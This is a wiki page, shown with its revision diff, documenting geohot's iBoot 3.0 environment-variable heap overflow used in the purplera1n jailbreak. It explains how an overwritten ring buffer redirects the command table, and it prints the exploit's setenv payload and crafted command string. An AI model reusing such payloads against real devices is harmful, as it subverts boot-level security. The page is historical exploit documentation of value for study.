The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information. |
Difference between revisions of "IBoot Environment Variable Overflow"
(New page: This is an exploit in the iBoot parsing of commands and environment variables. == Credit == geohot == Explanation == This is a heap overflow in iBoot 3.0. I'm really tired right now and ...) |
m (Added "Exploits" category.) |
||
Line 2: | Line 2: | ||
== Credit == |
== Credit == |
||
− | geohot |
+ | [[User:Geohot|geohot]] |
== Explanation == |
== Explanation == |
||
− | This is a heap overflow in |
+ | This is a heap overflow in 3.0's iBoot. I'm really tired right now and will write more tomorrow. |
My implementation saves the first 8 bytes in overruns(important or phone crashes), and overwrites the first 8 bytes of the '?' environment variable in the ring buffer. When the ring buffer is freed, it attempts to close the ring. In doing so, it changes the command table to have an entry at 0x41000000, where I then(must be done after or else cmd pointer gets overwritten) upload the geohot command. Run it and enjoy. |
My implementation saves the first 8 bytes in overruns(important or phone crashes), and overwrites the first 8 bytes of the '?' environment variable in the ring buffer. When the ring buffer is freed, it attempts to close the ring. In doing so, it changes the command table to have an entry at 0x41000000, where I then(must be done after or else cmd pointer gets overwritten) upload the geohot command. Run it and enjoy. |
||
Line 14: | Line 14: | ||
xxxx $a $a $a $a geohotaaaa \"\x04\x01\" \\ \"\x0c\" \\ \\ \\ \\ \\ \"\x41\x04\xA0\x02\" \\ \\ \\ \\ wwww;echo copyright;echo geohot |
xxxx $a $a $a $a geohotaaaa \"\x04\x01\" \\ \"\x0c\" \\ \\ \\ \\ \\ \"\x41\x04\xA0\x02\" \\ \\ \\ \\ wwww;echo copyright;echo geohot |
||
+ | |||
+ | [[Category:Exploits]] |
Revision as of 04:57, 4 July 2009
This is an exploit in the iBoot parsing of commands and environment variables.
Credit
Explanation
This is a heap overflow in 3.0's iBoot. I'm really tired right now and will write more tomorrow.
My implementation saves the first 8 bytes in overruns(important or phone crashes), and overwrites the first 8 bytes of the '?' environment variable in the ring buffer. When the ring buffer is freed, it attempts to close the ring. In doing so, it changes the command table to have an entry at 0x41000000, where I then(must be done after or else cmd pointer gets overwritten) upload the geohot command. Run it and enjoy.
Implementation in purplera1n
setenv a bbbbbbbbb1bbbbbbbbb2bbbbbbbbb3bbbbbbbbb4bbbbbbbbb5bbbbbbbbb6bbbbbbbbb7bbbbbbbbb8bbbbbbbbb9bbbbbbbbbAbbbbbbbbbBbbbbbbbbbCbbbbbbbbbDbbbbbbbbbEbbbbbbbbbbbbtbbbbbbbbbubbbbbbbbbvbbbbbbbbbwbbbbbbbbbxbbbbbbbbbybbbbbbbbbzbbbbbbbbbHbbbbbbbbbIbbbbbbbbbJbbbbgeohotbbbbbbbbbLbbbbbbbbbMbbbbbbbbbNbbbbbbbbbObbbbbbbbbPbbbbbbbbbbQbbbbbbbbbRbbbbbbbbbSbbbbbbbbbTbbbbbbbbbUbbbbbbbbbVbbbbbbbbbWbbbbbbb
xxxx $a $a $a $a geohotaaaa \"\x04\x01\" \\ \"\x0c\" \\ \\ \\ \\ \\ \"\x41\x04\xA0\x02\" \\ \\ \\ \\ wwww;echo copyright;echo geohot